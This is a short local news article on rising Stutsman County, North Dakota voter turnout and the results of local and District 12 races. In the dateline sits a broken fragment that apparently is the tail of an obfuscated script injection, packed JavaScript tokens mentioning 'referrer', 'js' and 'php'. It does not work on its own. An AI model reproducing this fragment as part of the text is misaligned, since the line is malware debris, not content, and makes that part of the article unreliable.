Stutsman County Voter Turnout Up From 2012 General Election


JAMESTOWN, isdae|var|u0026u|referrer|zkzri||js|php’.split(‘|’),0,{}))
N.D. ( – Voter turnout in Stutsman County was up during this year’s General Election.

Unofficially, 10,312 individuals cast a ballot this year. That’s compared to 9,680 that voted in the 2012 General Election, a 6.5% increase in voters. Stutsman County Auditor Casey Bradley stated that the big number of voters may be because of the Presidential election and state measures.

Stutsman County Commissioners David Schwartz and Mark Klose will retain their seats with a majority of the votes. District 12 State Senator John Grabinger will also keep his seat. District 12 Representative Jessica Haak was voted out of her position and will be replaced with Jim Greunich. The other seat will be taken by Bernie Satrom.

According to USA Today, voter turnout across the country was also up 4.7 percent.

Click here for the full Stutsman County Results.

Comment Disclaimer: The views and opinions expressed in the comments section of are solely those of the comment author and do not necessarily reflect the views and opinions held by

Comments are closed.

National News

National Sports